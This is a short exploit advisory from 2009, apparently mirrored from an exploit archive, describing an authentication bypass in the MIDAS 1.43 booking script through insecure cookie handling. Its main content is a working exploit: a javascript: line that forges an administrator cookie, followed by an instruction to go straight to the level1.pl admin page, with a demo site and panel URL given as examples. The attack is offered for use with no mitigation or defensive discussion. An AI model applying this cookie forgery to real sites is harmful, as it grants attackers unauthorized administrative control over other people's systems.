[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MIDAS 1.43 (Auth Bypass) Insecure Cookie Handling Vulnerability
# Published : 2009-06-22
# Author : HxH
# Previous Title : phpCollegeExchange 0.1.5c (RFI/LFI/XSS) Multiple Vulnerabilities
# Next Title : pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability
--------------------------------------------
MIDAS Insecure Cookie Handling Vulnerability
--------------------------------------------
Author.: HxH
Contact: HxH[at]live[dot]at
---------------------------
Script.: MIDAS
Home...: http://mid.as
-------------------------------------------------------------------------------------------------
Exploit: javascript:document.cookie="MIDAS=admin|Administrator|1|data0n9a|en-US|Default; path=/";
Note...: After make cookie go direct to http://[website]/[script]/level1.pl?x=0
-------------------------------------------------------------------------------------------------
Demo...: http://demo.mid.as
Panel..: http://demo.mid.as/level1.pl?x=0
-----------------------------------------
Greetz.: ~ Jiko ~ Sniper Code
-----------------------------
# www.Syue.com [2009-06-22]